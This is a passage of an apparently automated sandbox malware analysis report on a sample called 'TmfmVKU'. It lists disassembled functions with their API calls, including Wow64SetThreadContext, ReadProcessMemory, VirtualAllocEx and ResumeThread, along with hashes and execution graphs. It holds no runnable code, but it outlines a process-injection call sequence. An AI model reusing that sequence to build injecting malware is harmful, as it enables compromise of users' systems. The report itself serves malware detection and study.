                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: e3296fdc812c6caf82d28daee9b1c014a722b69b3c4381b79bb1f7d272b8385b
                        • Instruction ID: 5fb57cb8830d92d2cf6d43e925bd67b0c9c49d37465574deb371375783d63c22
                        • Opcode Fuzzy Hash: e3296fdc812c6caf82d28daee9b1c014a722b69b3c4381b79bb1f7d272b8385b
                        • Instruction Fuzzy Hash: 602149B59003099FDB10DFAAC4857EEFBF4EF88324F148429D419A7241CB78A945CFA4
                        Function 031A10EB Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 678 31a10eb-31a113b 680 31a114b-31a117b Wow64SetThreadContext 678->680 681 31a113d-31a1149 678->681 683 31a117d-31a1183 680->683 684 31a1184-31a11b4 680->684 681->680 683->684
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 031A116E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 21a753c2d9be2ac9d1c2873319f2f04a236a97d9bbbde412b6395dd11bb16db2
                        • Instruction ID: 8625e4dc82ef25febe27d64032233dba199e9e9835400a6302192a44671a82da
                        • Opcode Fuzzy Hash: 21a753c2d9be2ac9d1c2873319f2f04a236a97d9bbbde412b6395dd11bb16db2
                        • Instruction Fuzzy Hash: 7B2134B5D003099FDB10DFAAC9857EEBBF4AF48324F14842AD419A7241CB78A945CFA4
                        Function 031A17B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 031A1830
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 4f27feecd9c30ecb8f130494f4b1b576a7c0ae3ecf48ba6ae64d46379de6ad74
                        • Instruction ID: 848dca80be545390896a91bcbf652e109477b5f48ba147671dd4872cbf2cf804
                        • Opcode Fuzzy Hash: 4f27feecd9c30ecb8f130494f4b1b576a7c0ae3ecf48ba6ae64d46379de6ad74
                        • Instruction Fuzzy Hash: 692128B1C003499FCB10DFAAC885ADEFBF5FF48310F548429E519A7241C7389945DBA4
                        Function 01A6D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A6D717
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: f663974082740eda003839db6541842dd4cad5e04d9c0e313d4fbf88c98f4ae8
                        • Instruction ID: d94dcab102aad847a2f7c0b6404e9aaf6b92b38cf4d9d57fa1beba0b8d492176
                        • Opcode Fuzzy Hash: f663974082740eda003839db6541842dd4cad5e04d9c0e313d4fbf88c98f4ae8
                        • Instruction Fuzzy Hash: F321E4B59002499FDB10CF9AD984ADEBFF8FB48310F14801AE958A3350D378A954CFA5
                        Function 01A6A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A6B079,00000800,00000000,00000000), ref: 01A6B28A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 7942b398a6b704c9b0d493273650d6a036b28d184557c096deab7fff176eed04
                        • Instruction ID: 94f94b05c47b344086de0d7ed75cc952f8bd5cf7c5de6834a749a124816e39f1
                        • Opcode Fuzzy Hash: 7942b398a6b704c9b0d493273650d6a036b28d184557c096deab7fff176eed04
                        • Instruction Fuzzy Hash: 7A11F3B69003499FDB14DFAAD548ADEFBF8EB88310F14842EE519A7200C375A945CFA5
                        Function 01A6B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A6B079,00000800,00000000,00000000), ref: 01A6B28A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4a7a446f26b64f64bb1ade9259419f75b87edd3795e35976b97f6eebe71979f4
                        • Instruction ID: a418b71501a81ce1570ebd906971a90e64f278bd0e984cad395c41490dc8ceb1
                        • Opcode Fuzzy Hash: 4a7a446f26b64f64bb1ade9259419f75b87edd3795e35976b97f6eebe71979f4
                        • Instruction Fuzzy Hash: 1F11F6B6D003098FDB14DFAAD484ADEFBF4EB48310F14852ED519A7210C375A645CFA5
                        Function 031A15F9 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 031A166E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 1c28dec54cdf808d27ba03b17b6c02a55f81e7f3d5532a845f5a2d358ca5eeaa
                        • Instruction ID: 34cdc848f29d28e53bec1b7dc0af4326f50aa7bed74c17aca785c7ba447340fe
                        • Opcode Fuzzy Hash: 1c28dec54cdf808d27ba03b17b6c02a55f81e7f3d5532a845f5a2d358ca5eeaa
                        • Instruction Fuzzy Hash: D6116AB58002099FCF10DFA9C845BDEBFF5EF88324F148419E919A7250C775A955CFA1
                        Function 031A1600 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 031A166E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9a4d3b31f9fe3b7c247c7ef40c2e43818a74d240b4963d4620a48c3742cb072e
                        • Instruction ID: 2deb06ca08810a434f3c861cfbd85a939214cf81d00888b6d04b23b9949bb820
                        • Opcode Fuzzy Hash: 9a4d3b31f9fe3b7c247c7ef40c2e43818a74d240b4963d4620a48c3742cb072e
                        • Instruction Fuzzy Hash: B31164B58002099FCB10DFAAC844ADFFFF5EF88320F248419E519A7250CB75A940CFA0
                        Function 031A1038 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                        Download Yara Rule
                        APIs
                        • ResumeThread.KERNELBASE(000000D0), ref: 031A10A2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5d3f7c88de962389f3afaad25aa372bbdd77ccfee548297d65f6c1741714a362
                        • Instruction ID: 9ffb426e096688b1487e3c14a0cae9b376bbdd7ddd80d7b9822e7a96c4c85b59
                        • Opcode Fuzzy Hash: 5d3f7c88de962389f3afaad25aa372bbdd77ccfee548297d65f6c1741714a362
                        • Instruction Fuzzy Hash: 211158B5D007498FDB20DFAAC5457EEFBF5AF88324F24842AC519B7240C739A544CB91
                        Function 031A1040 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        • ResumeThread.KERNELBASE(000000D0), ref: 031A10A2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: c8c300e3c6dd425cbf6534d094e6126f836948a2ac11415c807f1238e109e8a5
                        • Instruction ID: c7a2270d498000116b41d295762a1f81c239f0d328c83a70cd5a5e3f0034d482
                        • Opcode Fuzzy Hash: c8c300e3c6dd425cbf6534d094e6126f836948a2ac11415c807f1238e109e8a5
                        • Instruction Fuzzy Hash: 971155B59003498FCB20DFAAC5457DEFBF4EB88324F24842AC519A7240CB39A944CBA4
                        Function 01A6AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01A6AFFE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 315d9ace530a184fa2580b0e2e1d58e668fd40893397e7aa3a9103680c592d45
                        • Instruction ID: 8115f38da2dc307974b4e8e29492be48e1c1e98313db81a4790b4e73df06f5ff
                        • Opcode Fuzzy Hash: 315d9ace530a184fa2580b0e2e1d58e668fd40893397e7aa3a9103680c592d45
                        • Instruction Fuzzy Hash: B51110B5C003498FDB14CF9AC444ADEFBF8EB88324F11841AD529B7210C379A545CFA1
                        Function 031A393C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 031A5625
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 9d7c313ea84f90af45613913dd5499813b763cd5ba74e6cad6f2c1034c80ca48
                        • Instruction ID: ab8acfabbca8aac776d52c660f86ce2adec730a3d2067873830feec70826b6b3
                        • Opcode Fuzzy Hash: 9d7c313ea84f90af45613913dd5499813b763cd5ba74e6cad6f2c1034c80ca48
                        • Instruction Fuzzy Hash: 641133B580074D9FCB10DF8AC988BDEFBF8EB48320F108419E958A7200C375A984CFA4
                        Function 031A55C3 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 031A5625
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: a80100d90341e291abd2160bef970a14913421a6a1aee28da5bac95f887e8cce
                        • Instruction ID: c626cf6c9d1a0f1ddb3eaabe1cc9c6b5ebb6d300d30eeb5cf65ff15fb7c6f04a
                        • Opcode Fuzzy Hash: a80100d90341e291abd2160bef970a14913421a6a1aee28da5bac95f887e8cce
                        • Instruction Fuzzy Hash: DE11FEB98007498FDB10CF99D989BDEBBF4EB48320F24841AE559A7250C375AA44CFA0
                        Function 0172D3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855374077.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_172d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9738e222e3f56c131684bdfed7411f17dd1af437abcde578d42291a4397d17ef
                        • Instruction ID: 01baa69c9f4aab725251ee91043da262b6a61c8f975568b6a79ee6d35b95256b
                        • Opcode Fuzzy Hash: 9738e222e3f56c131684bdfed7411f17dd1af437abcde578d42291a4397d17ef
                        • Instruction Fuzzy Hash: 0F2102B1504200DFDB15DF88C9C4B56BB65FB94324F20C5A9DD0A0A246C336E456C6A1
                        Function 0172D4C4 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855374077.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_172d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8770bc36635de080367b2533c35fa3137a3784894521d754d6f3bb6831edafa7
                        • Instruction ID: c878616558c68eb9d9aa5299f8260d3d9eaa8409191dc2e0ffd9966971a17956
                        • Opcode Fuzzy Hash: 8770bc36635de080367b2533c35fa3137a3784894521d754d6f3bb6831edafa7
                        • Instruction Fuzzy Hash: 812121B1504240DFDB21DF58C8C0B26FFA5FB88328F30C6A9E8090A246C376D456CAA1
                        Function 01A1D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855511496.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a1d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 23900e5c3f69272fae6d8567d0ca15dc229f0450767c202cd18a2eac4a75e9a8
                        • Instruction ID: 7cb04219d8314f871b4238cd4830a5c9482833f5c3d569f01c05a6ca48e2477b
                        • Opcode Fuzzy Hash: 23900e5c3f69272fae6d8567d0ca15dc229f0450767c202cd18a2eac4a75e9a8
                        • Instruction Fuzzy Hash: 5521F5B5604200EFDB05DF98D9C8B65BBB5FB84324F24CA6DD91A4B25AC336D406CA61
                        Function 01A1D01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855511496.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a1d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6f175bcca0f438e881ecace903b4e7e7dd6f9824d95fa1362035a2af3ab73ab
                        • Instruction ID: 38735944a1cd2ad88c5da5e5ac84741c3f6bed9e96e9b2a50bdb2c5513237c9a
                        • Opcode Fuzzy Hash: c6f175bcca0f438e881ecace903b4e7e7dd6f9824d95fa1362035a2af3ab73ab
                        • Instruction Fuzzy Hash: BF21D075604200EFDB15DF58D988B26BBA5FB84364F24C96DD90B4B28AC33AD847CA61
                        Function 01A1D006 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855511496.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a1d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 199b64d36de73e6680f21cb8fcc0557ed4eeeef9f343fff3b765c7e1c51ca464
                        • Instruction ID: 770794d998a84d7a6c5e91ab025b5921186a4757b0b94ab075503b0d42a651d7
                        • Opcode Fuzzy Hash: 199b64d36de73e6680f21cb8fcc0557ed4eeeef9f343fff3b765c7e1c51ca464
                        • Instruction Fuzzy Hash: A421A1755093808FDB03CF24D994B15BF71EB45324F28C5DAD84A8B2A7C33AD84ACB62
                        Function 0172D4BF Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855374077.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_172d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                        • Instruction ID: 985382b9b0ea62a80806eeb575b2f37116471688615b2fb8f2414b6929a89bca
                        • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                        • Instruction Fuzzy Hash: 8A11CD76504280CFDB12CF54D5C4B16BF72FB84224F34C6A9D8090B256C336D45ACBA1
                        Function 0172D3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855374077.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_172d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                        • Instruction ID: 0ab9be86ddeb56c2cc38f7471f239b40be9ba5ec73ff8e207091b125c8254738
                        • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                        • Instruction Fuzzy Hash: 7611CA76504280CFDB12CF44D9C4B56BF72FB84224F24C2A9DD090A256C33AE45ACBA2
                        Function 01A1D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855511496.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a1d000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction ID: 7d9e78b453793507435b7c07b275daa46152385b9b53b353eaee825a33caacbe
                        • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction Fuzzy Hash: 7211BB75904280DFDB02CF58C5C8B15BBB2FB84224F28C6ADD8494B69AC33AD40ACB61

                        Execution Graph

                        Execution Coverage:13.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:30
                        Total number of Limit Nodes:1
                        execution_graph 29182 6536361 29183 653636a 29182->29183 29184 65362fc 29182->29184 29188 65373f1 29184->29188 29192 6537400 29184->29192 29185 653631d 29189 653738d 29188->29189 29189->29188 29190 6537451 29189->29190 29196 6536f98 29189->29196 29190->29185 29193 6537448 29192->29193 29194 6537451 29193->29194 29195 6536f98 LoadLibraryW 29193->29195 29194->29185 29195->29194 29197 65375f0 LoadLibraryW 29196->29197 29199 6537665 29197->29199 29199->29190 29160 2ba0871 29164 2ba08d8 29160->29164 29169 2ba08c8 29160->29169 29161 2ba0889 29165 2ba08fa 29164->29165 29174 2ba0ce0 29165->29174 29178 2ba0ce8 29165->29178 29166 2ba093e 29166->29161 29170 2ba08fa 29169->29170 29172 2ba0ce8 GetConsoleWindow 29170->29172 29173 2ba0ce0 GetConsoleWindow 29170->29173 29171 2ba093e 29171->29161 29172->29171 29173->29171 29175 2ba0d26 GetConsoleWindow 29174->29175 29177 2ba0d56 29175->29177 29177->29166 29179 2ba0d26 GetConsoleWindow 29178->29179 29181 2ba0d56 29179->29181 29181->29166

                        Executed Functions

                        Function 065375E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 857 65375e8-6537630 859 6537632-6537635 857->859 860 6537638-6537663 LoadLibraryW 857->860 859->860 861 6537665-653766b 860->861 862 653766c-6537689 860->862 861->862
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065374A6), ref: 06537656
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984624118.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6530000_TmfmVKU.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: X3=<
                        • API String ID: 1029625771-1280808865
                        • Opcode ID: 1a1e07192fa0dccb51f9a38a151369bc30719122761ad386b66e51ff45d9d21b
                        • Instruction ID: 979db975e85a6cc45ad0b67850400620baadf9e90762415f18250abdf45c4f7c
                        • Opcode Fuzzy Hash: 1a1e07192fa0dccb51f9a38a151369bc30719122761ad386b66e51ff45d9d21b
                        • Instruction Fuzzy Hash: F81112B6C003498FDB10DF9AC844ACEFBF5EF88620F14842AD429A7611C774A546CFA5
                        Function 06536F98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 865 6536f98-6537630 867 6537632-6537635 865->867 868 6537638-6537663 LoadLibraryW 865->868 867->868 869 6537665-653766b 868->869 870 653766c-6537689 868->870 869->870
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065374A6), ref: 06537656
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984624118.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6530000_TmfmVKU.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: X3=<
                        • API String ID: 1029625771-1280808865
                        • Opcode ID: 106e9e2fecc0669a12705f7e9b4b89454970a3ef77631430fe7757b0f29dfe5f
                        • Instruction ID: 5c30d4f93d89b071967ef930d4ff6da91981c9f8a5a21a0acf030cb114e02bf3
                        • Opcode Fuzzy Hash: 106e9e2fecc0669a12705f7e9b4b89454970a3ef77631430fe7757b0f29dfe5f
                        • Instruction Fuzzy Hash: D81123B6D003498FDB10DF9AC844A9EFBF4EF88220F14841AD429B7210D775A945CFA9
                        Function 02BA0CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 873 2ba0ce0-2ba0d54 GetConsoleWindow 876 2ba0d5d-2ba0d82 873->876 877 2ba0d56-2ba0d5c 873->877 877->876
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02BA0D47
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965950945.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_2ba0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID: X3=<
                        • API String ID: 2863861424-1280808865
                        • Opcode ID: 291850989223803add2e9fe710e7a4934d3fd3cc7fbc7f38ddcab6d406b3cd97
                        • Instruction ID: 5192adbfebaf638357143cbdfdcdbe08d86271b6576d57af600aa681d2bd662d
                        • Opcode Fuzzy Hash: 291850989223803add2e9fe710e7a4934d3fd3cc7fbc7f38ddcab6d406b3cd97
                        • Instruction Fuzzy Hash: C41116B19003498FCB20DFAAC4457DEBFF1AB88324F248459C559A7240CB35A945CF90
                        Function 02BA0CE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 881 2ba0ce8-2ba0d54 GetConsoleWindow 884 2ba0d5d-2ba0d82 881->884 885 2ba0d56-2ba0d5c 881->885 885->884
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02BA0D47
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965950945.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_2ba0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID: X3=<
                        • API String ID: 2863861424-1280808865
                        • Opcode ID: 5e826b19fd10d38ac82f98005619133c0c00cb307cad0da148f2d6f7e428471f
                        • Instruction ID: 9dead48dbaabb3e418ce3711180361d8c9d05b9fd4a958d841a37d4c865e04f0
                        • Opcode Fuzzy Hash: 5e826b19fd10d38ac82f98005619133c0c00cb307cad0da148f2d6f7e428471f
                        • Instruction Fuzzy Hash: 5E1136B19003498FCB20DFAAC4457DFFBF4EB88324F208859C559A7240CB35A944CFA5
                        Function 06581550 Relevance: 1.4, Instructions: 1420COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 530d838e395e885cd1c0e0206efd91c75d4f8503250ca7eef34fa220da0a0f54
                        • Instruction ID: 9202464c261a6b159846eefb7358a6bbd42900e66a668c185f391edf72b7a5eb
                        • Opcode Fuzzy Hash: 530d838e395e885cd1c0e0206efd91c75d4f8503250ca7eef34fa220da0a0f54
                        • Instruction Fuzzy Hash: BFC25F74B006189FDB54DB54C851EADBBB6FF88700F508099E60AAB7A1DB31EE41CF91
                        Function 0658349D Relevance: 1.3, Instructions: 1280COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2bc96176e897d05c223db476ed2036eb0f7ed5b07b2218a323ac2acec8fd85e
                        • Instruction ID: b76f98a667415599d224d9b980694166fbdf81e0fa05e40c8c06ef901e62424f
                        • Opcode Fuzzy Hash: f2bc96176e897d05c223db476ed2036eb0f7ed5b07b2218a323ac2acec8fd85e
                        • Instruction Fuzzy Hash: 3DA1D274B002459FCB45DBB8C994A6EBBF6FF88700B1084AAE516DB7A1DB31DC01CB61
                        Function 06580048 Relevance: .7, Instructions: 664COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba08d377aa77c2587ab673b2323f48a2d6386737a43da3298ffd9dac830cddf2
                        • Instruction ID: cfd3d4e79803648bd5404bcf81b2ccd40e50d5cf5b450767eeeeb618f000ce27
                        • Opcode Fuzzy Hash: ba08d377aa77c2587ab673b2323f48a2d6386737a43da3298ffd9dac830cddf2
                        • Instruction Fuzzy Hash: A2425830B006249FCB25EF78D550A6EBBF2FFC1706B50898CD5079B795CB75A8098B86
                        Function 065804F4 Relevance: .5, Instructions: 499COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
